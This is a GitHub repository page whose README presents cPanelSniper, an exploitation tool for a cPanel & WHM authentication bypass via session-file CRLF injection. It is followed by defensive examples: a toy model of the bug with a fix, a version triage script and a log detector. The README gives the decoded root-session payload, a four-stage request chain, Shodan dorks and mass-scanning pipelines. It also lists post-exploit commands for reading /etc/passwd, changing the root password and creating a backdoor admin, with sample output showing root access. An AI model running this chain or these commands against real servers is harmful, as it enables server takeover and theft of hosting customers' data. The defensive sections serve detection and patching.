Repository: ynsmroztas/cPanelSniper (owner: ynsmroztas) · Language: Python · Default branch: main · License: not set
Stars: 459 (+2 in 1 day, +7 in 7 days, +71 in 30 days) · Forks: 131 · Watchers: 6 · Open issues: 4 · Last updated: 2026-06-12 02:00:07
Description: CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection

Site summary (translated from Chinese): cPanelSniper is an exploitation framework for CVE-2026-41940, a vulnerability that lets an attacker bypass cPanel & WHM authentication by injecting CRLF sequences into the session file. Its core features are a four-stage exploit chain, an interactive WHM shell and a bulk scanner, built entirely on the Python standard library with no additional dependencies. It is intended for authorized security testing and bug bounty programs; exploitation has been confirmed in the wild, and the vulnerability affects roughly 70 million domains running cPanel & WHM.

# cPanelSniper

<p align="center">
  <img src="cPanelSniper.jpg" alt="cPanelSniper" width="700"/>
</p>

<p align="center">
  <a href="https://www.python.org/"><img src="https://img.shields.io/badge/Python-3.8%2B-blue?style=flat-square&logo=python" alt="Python"></a>
  <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-41940"><img src="https://img.shields.io/badge/CVE--2026--41940-CVSS%3A10.0-red?style=flat-square" alt="CVE"></a>
  <img src="https://img.shields.io/badge/cPanel%20%26%20WHM-Auth%20Bypass-critical?style=flat-square&color=red" alt="cPanel">
  <img src="https://img.shields.io/badge/stdlib%20only-no%20pip-green?style=flat-square" alt="stdlib">
  <img src="https://img.shields.io/badge/pipeline-ready-blue?style=flat-square" alt="pipeline">
  <a href="https://twitter.com/ynsmroztas"><img src="https://img.shields.io/badge/Author-@ynsmroztas-orange?style=flat-square&logo=twitter" alt="Author"></a>
</p>

<p align="center">
  <b>CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection</b><br>
  4-stage exploit chain · Interactive WHM Shell · Bulk scanner · Pipeline ready · stdlib only
</p>

---

## Overview

**cPanelSniper** is a focused exploitation framework for **CVE-2026-41940**, a critical authentication bypass in cPanel & WHM. The vulnerability lets an unauthenticated remote attacker obtain root-level WHM access, without any valid credentials, by injecting CRLF sequences into the session file through the `Authorization` HTTP header.

- **CVSS Score:** 10.0 (Critical)
- **In-the-wild exploitation:** Confirmed (April 2026)
- **Exposure:** ~70 million domains hosted on cPanel & WHM servers
- **No dependencies:** Pure Python stdlib — no pip, no requests, no external packages

> **For authorized penetration testing and bug bounty programs only.**

---

## How It Works

The root cause lives in `Session.pm`: the `saveSession()` function calls `filter_sessiondata()` **after** writing the session file to disk. CRLF characters embedded in the `Authorization: Basic` header value are therefore written verbatim into the session file, and the attacker-controlled fields they introduce are already on disk before sanitization ever runs.

```
Intended flow:
  POST /login/ → filter_sessiondata() → write session → auth check

Vulnerable flow:
  POST /login/ → write session (CRLF payload injected) → filter_sessiondata() → auth check reads poisoned file
```

### The CRLF Payload

The base64 portion of the `Authorization: Basic` header decodes to:

```
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
```

These fields are written directly into the session file on disk. When the file is read back, cPanel treats the session as a fully authenticated root session.

### 4-Stage Exploit Chain

```
┌─────────────────────────────────────────────────────────────┐
│  Stage 0 — Canonical Hostname Discovery                     │
│  GET /openid_connect/cpanelid → 307 → real hostname         │
├─────────────────────────────────────────────────────────────┤
│  Stage 1 — Mint Preauth Session                             │
│  POST /login/?login_only=1  (wrong creds)                   │
│  ← 401 + whostmgrsession cookie                             │
├─────────────────────────────────────────────────────────────┤
│  Stage 2 — CRLF Injection                                   │
│  GET / + Cookie: session + Authorization: Basic <payload>   │
│  cpsrvd writes CRLF fields into session file                │
│  ← 307 Location: /cpsessXXXXXXXXXX/...                      │
├─────────────────────────────────────────────────────────────┤
│  Stage 3 — Propagate (do_token_denied gadget)               │
│  GET /scripts2/listaccts                                    │
│  Triggers raw→cache flush — injected fields become active   │
│  ← 401 Token denied (expected)                              │
├─────────────────────────────────────────────────────────────┤
│  Stage 4 — Verify WHM Root Access                           │
│  GET /cpsessXXXXXXXXXX/json-api/version                     │
│  ← 200 {"version":"11.x.x.x","result":1}  = PWNED          │
└─────────────────────────────────────────────────────────────┘
```

---

## Affected Versions

| Branch | Vulnerable | Patched |
|--------|-----------|---------|
| 110.x | ≤ 11.110.0.96 | **11.110.0.97** |
| 118.x | ≤ 11.118.0.62 | **11.118.0.63** |
| 126.x | ≤ 11.126.0.53 | **11.126.0.54** |
| 132.x | ≤ 11.132.0.28 | **11.132.0.29** |
| 134.x | ≤ 11.134.0.19 | **11.134.0.20** |
| 136.x | ≤ 11.136.0.4  | **11.136.0.5**  |

Branches not listed here (the sample output below reports a target on 11.130.0.6) are not covered by this table; check the cPanel advisory linked under References for the authoritative list.

---

## Installation

```bash
git clone https://github.com/ynsmroztas/cPanelSniper
cd cPanelSniper
python3 cPanelSniper.py --help
```

No pip install required. Pure Python 3.8+ stdlib only.

---

## Usage

### Basic Scan

```bash
# Single target — scan only
python3 cPanelSniper.py -u https://target.com:2087

# Single target — interactive shell after bypass
python3 cPanelSniper.py -u https://target.com:2087 --action shell

# Bulk scan from file
python3 cPanelSniper.py -l targets.txt -t 20 -o results.json

# Force scan (skip cPanel detection)
python3 cPanelSniper.py -u https://target.com:2087 --force
```

### Post-Exploit Actions

```bash
# List all cPanel accounts on the server
python3 cPanelSniper.py -u https://target.com:2087 --action list

# Execute OS command
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"

# Get server info (hostname, load, disk, MySQL host)
python3 cPanelSniper.py -u https://target.com:2087 --action info

# Get cPanel version
python3 cPanelSniper.py -u https://target.com:2087 --action version

# Change root password
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'

# Interactive WHM shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell
```

### Pipelines

```bash
# subfinder → httpx → cPanelSniper
subfinder -d target.com -silent | \
  httpx -silent -ports 2087,2086 -threads 50 | \
  python3 cPanelSniper.py -t 30 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2087,2086 -threads 100 | \
  python3 cPanelSniper.py -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python3 cPanelSniper.py -t 30 -o shodan_results.json

# stdin pipe
echo "https://target.com:2087" | python3 cPanelSniper.py

# Multiple sources combined
{ subfinder -d target.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python3 cPanelSniper.py -t 20 --action list
```

---

## Interactive WHM Shell

After a successful bypass, the `--action shell` flag drops into an interactive prompt:

```
════════════════════════════════════════════════════════════
  WHM Shell — target.com
  Version: CVE-2026-41940 | Auth: CRLF bypass
  Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════

mitsec@target.com ▶ id
  uid=0(root) gid=0(root) groups=0(root)

mitsec@target.com ▶ accounts
  [cPanel Accounts]  target.com:2087 (47 users)
    user01               domain: example.com    email: admin@example.com
    user02               domain: shop.com       email: info@shop.com
    ...

mitsec@target.com ▶ cat /etc/passwd
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  ...

mitsec@target.com ▶ info
  [Server Info]  https://target.com:2087
  hostname: srv01.target.com
  load: 0.72 / 0.66 / 0.69
  version: 11.130.0.6

mitsec@target.com ▶ addadmin mitsec P@ss2026!
  [BACKDOOR ADMIN CREATED]
  Target   : https://target.com:2087
  Username : mitsec
  Password : P@ss2026!
  Profile  : super_admin

mitsec@target.com ▶ exit
```

### Shell Commands

| Command | Description |
|---------|-------------|
| `id` / `whoami` | Show UID and hostname |
| `hostname` | Get server hostname |
| `version` | cPanel version info |
| `info` | Load, disk, MySQL host, version |
| `accounts` | List all cPanel user accounts |
| `cat <path>` | Read file content |
| `ls [path]` | List directory |
| `exec <cmd>` | Execute OS command |
| `addadmin <user> <pass>` | Create backdoor WHM admin |
| `passwd <pass>` | Change root password |
| `api <endpoint> [k=v ...]` | Raw WHM JSON API call |
| `help` | Show all commands |
| `exit` | Exit shell |

---

## CLI Reference

```
usage: cPanelSniper.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] [--no-color]

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors
```

---

## Shodan Dorks

```
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"cPanel" port:2083
ssl.cert.subject.cn:"cPanel" port:2087
```

---

## Output Example

```
   ██████╗██████╗  █████╗ ███╗  ██╗███████╗██╗
  ██╔════╝██╔══██╗██╔══██╗████╗ ██║██╔════╝██║
  ...

  CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection
  4-stage: preauth → CRLF inject → propagate → verify → post-exploit
  In-The-Wild | CVSS 10.0 | By Mitsec (@ynsmroztas)

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : list

14:46:22 [SCAN] Starting 4-stage exploit chain... https://target.com:2087
14:46:23 [INFO] Canonical hostname discovered: srv01.target.com
14:46:23 [STEP] Stage 1/4 — Minting preauth session...
14:46:23 [  OK] Stage1: preauth session = :QFB4o8XENBqlr6U1...
14:46:23 [STEP] Stage 2/4 — CRLF injection via Authorization header...
14:46:24 [  OK] Stage2: HTTP 307 → token=/cpsess8493537756
14:46:24 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
14:46:25 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
14:46:25 [STEP] Stage 4/4 — Verifying WHM root access...
14:46:26 [PWND] CVE-2026-41940 CONFIRMED — WHM root access!
14:46:26 [PWND]   Token    : /cpsess8493537756
14:46:26 [PWND]   Version  : 11.130.0.6
14:46:26 [PWND]   API URL  : https://target.com:2087/cpsess8493537756/json-api/version
14:46:26 [ API] Running post-exploit action: list
14:46:27 [ API] listaccts → HTTP 200

  [cPanel Accounts]  target.com:2087 (47 accounts)
    client01    domain: client01.com    email: admin@client01.com
    client02    domain: client02.net    email: info@client02.net
    ...

══════════════════════════════════════════════════════════════════════
  cPanelSniper — Scan Complete
  Time: 5.8s  ·  Targets: 1

  ⚡ 1 VULNERABLE TARGET(S)

  Target   : https://target.com:2087
  Version  : 11.130.0.6
  Token    : /cpsess8493537756
  API URL  : https://target.com:2087/cpsess8493537756/json-api/version
══════════════════════════════════════════════════════════════════════
```

---

## Technical Details

### Session File Injection

The injected `Authorization: Basic` value (base64-decoded) contains CRLF sequences that become line breaks in the cPanel session file:

```
root:x\r\n
successful_internal_auth_with_timestamp=9999999999\r\n
user=root\r\n
tfa_verified=1\r\n
hasroot=1
```

cPanel's session reader parses these as legitimate session fields, granting full root WHM access.

### Stage 3 — The do_token_denied Gadget

The critical and often-overlooked step: after the CRLF injection (Stage 2), the poisoned session data exists only in the **raw session file**. A request to `/scripts2/listaccts` triggers the internal `do_token_denied` handler, which flushes the raw session data into the session **cache**. Without this flush, Stage 4 would return a 403.

### Session Token Extraction

```
Set-Cookie: whostmgrsession=%3aSESSION_NAME%2cOB_HEX; ...
                              ^              ^
                              |              +-- ob hash (stripped)
                              +-- session name (used for injection)
```

The session name (everything before `%2C`) is extracted and used as the cookie value for subsequent requests; the `ob` hash after the comma is discarded.

---

## References

- [watchTowr Labs — CVE-2026-41940 Technical Analysis](https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/)
- [cPanel Security Advisory](https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026)
- [NVD — CVE-2026-41940](https://nvd.nist.gov/vuln/detail/CVE-2026-41940)
- [Hadrian Blog — CVE-2026-41940 Analysis](https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel)
- [Nuclei Template — CVE-2026-41940](https://cloud.projectdiscovery.io/library/CVE-2026-41940)

---

## Disclaimer

> This tool is intended for **authorized security testing** and **bug bounty programs only**. Unauthorized access to computer systems is illegal. The author assumes no liability and is not responsible for any misuse or damage caused by this tool. Always obtain proper written authorization before testing.

---

## Author

**Mitsec** — [@ynsmroztas](https://twitter.com/ynsmroztas)

- 🏆 Top Hacker — Intigriti
- 🐛 2,430+ vulnerabilities disclosed
- 💀 1,100+ P1 Critical findings
- 🏅 100+ Hall of Fame recognitions

---

<p align="center">
  Made with ❤️ by <a href="https://twitter.com/ynsmroztas">@ynsmroztas</a>
</p>
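---

The write-then-sanitize ordering described under "How It Works" is easiest to see in a toy model. The block below is an added example, not code from cPanelSniper or from cPanel's `Session.pm`: the one-key-per-line session format, the `save_session_*` and `is_authenticated_root` names, and the assumption that the rejected credential string is stored in the session's `user` field are simplifications for illustration. The CRLF payload is the one shown in the README. The vulnerable writer is placed beside the fixed one (sanitize before the only write), and a header-level check rejects control characters in Basic credentials before any session state exists at all.

```python
from __future__ import annotations

import base64
import binascii
import time


def parse_basic_auth(header_value: str) -> tuple[str, str]:
    """Decode an 'Authorization: Basic <b64>' value into (user, password).

    A credential never legitimately contains CR, LF or NUL, so refusing them
    here blocks the injection before any session file is written. This is a
    defence-in-depth layer independent of the Session.pm ordering fix.
    """
    scheme, _, b64 = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not Basic auth")
    try:
        decoded = base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("malformed Basic credentials") from exc
    if any(ch in decoded for ch in "\r\n\x00"):
        raise ValueError("control character in credentials")
    user, _, password = decoded.partition(":")
    return user, password


def filter_sessiondata(fields: dict[str, str]) -> dict[str, str]:
    """Strip CR/LF from every value (models the sanitiser the README names)."""
    return {k: v.replace("\r", "").replace("\n", "") for k, v in fields.items()}


def serialize(fields: dict[str, str]) -> str:
    # Assumed toy on-disk format: one key=value per line.
    return "".join(f"{k}={v}\n" for k, v in fields.items())


def parse_session_file(text: str) -> dict[str, str]:
    """Line-oriented reader; a later line for the same key wins, which is
    what lets injected lines override the legitimate ones."""
    session: dict[str, str] = {}
    for line in text.splitlines():
        if "=" in line:
            k, _, v = line.partition("=")
            session[k.strip()] = v.strip()
    return session


def save_session_vulnerable(store: dict[str, str], sid: str, fields: dict[str, str]) -> None:
    """Models the bug: the raw fields hit disk first; the sanitised copy is
    produced afterwards and never replaces what was written."""
    store[sid] = serialize(fields)      # unsanitised write
    filter_sessiondata(fields)          # too late: result is discarded


def save_session_fixed(store: dict[str, str], sid: str, fields: dict[str, str]) -> None:
    """Sanitise before the only write."""
    store[sid] = serialize(filter_sessiondata(fields))


def is_authenticated_root(session: dict[str, str], now: float | None = None) -> bool:
    """Root check over the fields the README shows being injected."""
    now = time.time() if now is None else now
    try:
        expiry = float(session.get("successful_internal_auth_with_timestamp", "0"))
    except ValueError:
        return False
    return (session.get("user") == "root"
            and session.get("hasroot") == "1"
            and session.get("tfa_verified") == "1"
            and expiry > now)


# Constructed payload: the decoded credential string from the README.
PAYLOAD_USER = ("root:x\r\n"
                "successful_internal_auth_with_timestamp=9999999999\r\n"
                "user=root\r\ntfa_verified=1\r\nhasroot=1")
PAYLOAD_HEADER = "Basic " + base64.b64encode(PAYLOAD_USER.encode()).decode()


def demo() -> dict[str, bool]:
    """Return whether the failed login ends up as a root session under each writer."""
    results: dict[str, bool] = {}
    for name, writer in (("vulnerable", save_session_vulnerable),
                         ("fixed", save_session_fixed)):
        store: dict[str, str] = {}
        # Simulated failed login. The credential field is written last so the
        # injected lines follow the legitimate ones in the last-wins reader.
        writer(store, "cpsess0000000000",
               {"successful_internal_auth_with_timestamp": "0",
                "tfa_verified": "0", "hasroot": "0",
                "user": PAYLOAD_USER})
        results[name] = is_authenticated_root(parse_session_file(store["cpsess0000000000"]))
    try:
        parse_basic_auth(PAYLOAD_HEADER)
        results["header_rejected"] = False
    except ValueError:
        results["header_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

Running it prints `{'vulnerable': True, 'fixed': False, 'header_rejected': True}`: the same payload yields a root session only when sanitization runs after the write, and never gets as far as the session layer once the header parser refuses control characters.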
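---

To decide which hosts in a fleet still need the update from the "Affected Versions" table, a per-branch numeric comparison is more reliable than eyeballing version strings. The following is an added example, not part of cPanelSniper; `PATCHED` is transcribed from the table above, the `INVENTORY` mapping is constructed, and `version_from_api()` parses the `{"version":"11.x.x.x","result":1}` response shape the README shows for `json-api/version` (that endpoint needs an authenticated WHM call when used legitimately). A version on a branch the table does not list, such as the 11.130.0.6 in the README's sample output, is reported as unknown rather than silently treated as patched.

```python
from __future__ import annotations

import json

# Transcribed from the README's "Affected Versions" table: branch -> first
# patched build. Anything below the patched build on that branch is vulnerable.
PATCHED: dict[int, tuple[int, int, int, int]] = {
    110: (11, 110, 0, 97),
    118: (11, 118, 0, 63),
    126: (11, 126, 0, 54),
    132: (11, 132, 0, 29),
    134: (11, 134, 0, 20),
    136: (11, 136, 0, 5),
}

# Constructed inventory of hostname -> reported cPanel version (not real hosts).
INVENTORY = {
    "web01.example.net": "11.110.0.96",
    "web02.example.net": "11.110.0.97",
    "web03.example.net": "11.130.0.6",
    "web04.example.net": "11.136.0.4",
}


def parse_version(text: str) -> tuple[int, ...]:
    """'11.110.0.96' -> (11, 110, 0, 96); raises ValueError on anything else."""
    parts = tuple(int(p) for p in text.strip().split("."))
    if len(parts) != 4 or parts[0] != 11:
        raise ValueError(f"not a cPanel 11.x.y.z version: {text!r}")
    return parts


def is_vulnerable(text: str) -> bool | None:
    """True/False for a branch in the table; None when the branch is not
    listed, so a caller can never mistake 'not in my table' for 'patched'."""
    v = parse_version(text)
    patched = PATCHED.get(v[1])
    if patched is None:
        return None
    return v < patched


def version_from_api(body: str) -> str:
    """Extract the version string from a json-api/version response body."""
    data = json.loads(body)
    if data.get("result") != 1 or "version" not in data:
        raise ValueError("unexpected json-api/version response")
    return data["version"]


def triage(hosts: dict[str, str]) -> dict[str, list[str]]:
    """Group hostname -> version pairs into vulnerable / patched / unknown."""
    buckets: dict[str, list[str]] = {"vulnerable": [], "patched": [], "unknown": []}
    for host, ver in hosts.items():
        state = is_vulnerable(ver)
        key = "unknown" if state is None else ("vulnerable" if state else "patched")
        buckets[key].append(host)
    return buckets


if __name__ == "__main__":
    for bucket, hosts in triage(INVENTORY).items():
        print(f"{bucket:11s} {', '.join(hosts) or '-'}")
```

The "unknown" bucket is the one to review by hand against the cPanel advisory, because a missing branch is just as likely to mean the table is incomplete as it is to mean the build was never affected.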
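---

On the defensive side, the 4-stage chain leaves an ordered request/status sequence in the WHM access log from a single client: a failed `POST /login/` (401), `GET /` answered with a 307 to a `/cpsess…/` URL, `GET /scripts2/listaccts` answered 401, then a 200 on `/cpsess…/json-api/version`. The detector below is an added example, not part of cPanelSniper or of any cPanel product. The log lines are constructed in Apache combined format; the real cpsrvd log layout may differ, so `LINE_RE` is the part to adapt. Stage 0 (hostname discovery via `/openid_connect/cpanelid`) is left out because it is indistinguishable from ordinary OpenID Connect traffic.

```python
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real traffic). The first client walks stages 1-4
# from the README; the second is an ordinary failed login followed by a
# successful one and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2026:14:46:23 +0000] "POST /login/?login_only=1 HTTP/1.1" 401 0 "-" "python-urllib/3.11"
203.0.113.7 - - [12/Jun/2026:14:46:24 +0000] "GET / HTTP/1.1" 307 0 "-" "python-urllib/3.11"
203.0.113.7 - - [12/Jun/2026:14:46:25 +0000] "GET /scripts2/listaccts HTTP/1.1" 401 0 "-" "python-urllib/3.11"
203.0.113.7 - - [12/Jun/2026:14:46:26 +0000] "GET /cpsess8493537756/json-api/version HTTP/1.1" 200 45 "-" "python-urllib/3.11"
198.51.100.9 - - [12/Jun/2026:14:50:01 +0000] "POST /login/?login_only=1 HTTP/1.1" 401 0 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Jun/2026:14:50:09 +0000] "POST /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Apache combined format prefix; adapt to the real cpsrvd access log layout.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Ordered stages 1-4: (method, path predicate, expected status).
STAGES = [
    ("POST", lambda p: p.startswith("/login/"), 401),
    ("GET", lambda p: p == "/", 307),
    ("GET", lambda p: p.startswith("/scripts2/listaccts"), 401),
    ("GET", lambda p: re.match(r"^/cpsess\d+/json-api/version", p) is not None, 200),
]


def parse_line(line: str):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def detect(log_text: str, window: timedelta = timedelta(minutes=5)) -> dict[str, list[datetime]]:
    """Return {ip: [time of each completed chain]} for every client that
    walked stages 1-4 in order within `window`. Unrelated requests in
    between are ignored; a chain older than `window` is restarted."""
    progress: dict[str, tuple[int, datetime]] = {}   # ip -> (next stage, chain start)
    hits: dict[str, list[datetime]] = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        idx, started = progress.get(ip, (0, ts))
        if idx == 0 or ts - started > window:
            idx, started = 0, ts
        method_wanted, path_ok, status_wanted = STAGES[idx]
        if method == method_wanted and path_ok(path) and status == status_wanted:
            idx += 1
            if idx == len(STAGES):
                hits[ip].append(ts)
                idx = 0
        progress[ip] = (idx, started)
    return dict(hits)


if __name__ == "__main__":
    for ip, times in detect(SAMPLE_LOG).items():
        for t in times:
            print(f"{ip}: CVE-2026-41940 chain completed at {t.isoformat()}")
```

The Stage 3 request is the high-signal element: a 401 on `/scripts2/listaccts` sandwiched between a 307 from `/` and a 200 on a `/cpsess…/json-api/` path is not what a browser session produces. Feeding the detector a real access log is a matter of reading the file into `detect()` once `LINE_RE` matches the local format.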